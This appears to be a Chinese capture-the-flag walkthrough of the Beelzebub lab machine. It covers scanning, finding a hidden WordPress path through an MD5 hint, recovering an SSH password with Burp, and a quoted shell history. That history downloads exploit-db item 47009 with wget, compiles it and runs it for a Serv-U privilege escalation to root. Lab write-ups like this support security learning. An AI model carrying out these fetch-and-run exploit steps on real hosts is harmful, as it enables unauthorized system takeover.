ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、开机信息,知道用户名(krampus)开机信息
2、主机发现(192.168.199.146)主机发现
3、端口扫描(22、80端口)端口扫描
4、查看web页面web页面
5、扫描目录dirb http://192.168.199.146/或dirsearch -u http://192.168.199.146/扫描目录
6、访问index首页index首页
查看index首页源代码,得到线索
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->index首页源代码
7、对 beelzebub 进行md5计算处理└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1d18e1e22becbd915b45e0e655429d487md5计算
8、尝试访问链接,被301重定向疑似wordpress站点
9、尝试遍历目录,可以确定就是wordpress站点dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/遍历目录
10、尝试访问uploadsuploads
点击 talk to valak
签订契约的人有时会试图智取魔鬼,但最终还是失败了。talk to valak
11、尝试burp分析,拿到密码 M4k3Ad3a1burp分析
12、尝试ssh登录ssh登录
13、成功获得普通用户flag普通flag
14、挖掘线索(.bash_history)krampus@beelzebub:~$ ls -latotal 104drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .drwxr-xr-x 3 root root 4096 Mar 16 2021 ..-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_historydrwx------ 11 krampus krampus 4096 Mar 20 2021 .cachedrwxrwxrwx 14 krampus krampus 4096 May 26 2020 .configdrwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbusdrwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktopdrwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documentsdrwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloadsdrwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupgdrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthoritydrwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .localdrwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilladrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Musicdrwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profiledrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successfuldrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templatesdrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts15、查看历史记录krampus@beelzebub:~$ cat .bash_history mysql -u root -pclearsu rootclearlkslsclearnano /etc/hostnano /etc/hostssu rootsu rootrm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip su rootclearexitchmod 0750 html/ifconfigcd /var/lib/mysql/clearlscd wordpress/sudo susu rootclearlscd Desktop/clearlscat user.txt clearuname -asudo -1sudo -iclearuname -asudo -ifind / -prem -u=s -type f 2>/dev/nullfind / -prem -u=s -type f 2>/dev/nullcat /etc/issuesudo -lcdcd ../cd ../../../../clearfind / -prem -u=s -type f 2>/dev/nullcd /usr/local/Serv-U/lscdclearps -auxps -aps -a -U rootps -a -U root | grep 'Serv'ps -U root -aups -U root -au | sort -uclearcd /tmp/clearfind / -prem -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullclearfind / -perm -u=s -type f 2>/dev/nullclearwget https://www.exploit-db.com/download/47009clearlsclearmv 47009 ./exploit.cgcc exploit.c -o exploit./exploit cd ../../../../../../../lscd cdcdgrep -r 'beelzebub'grep -r 'love'cd .local/shareclearlscd Trash/lscat infocd infolsls -lacd ../clearcd ../lsrm -rf Trash/clearsu roothistory -Rhistory -rmysql -u root -pclearsu rootclearlkslsclearnano /etc/hostnano /etc/hostssu rootsu rootrm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip su rootclearexithistoryclearcdclearip linksu rootclearlshistoryclearlscd /tmp/lssu rootexitclear16、根据 .bash_history 中的提示,完成提权,获得root的flag复现
到此,实验完成~
发布于 2022-08-22 21:46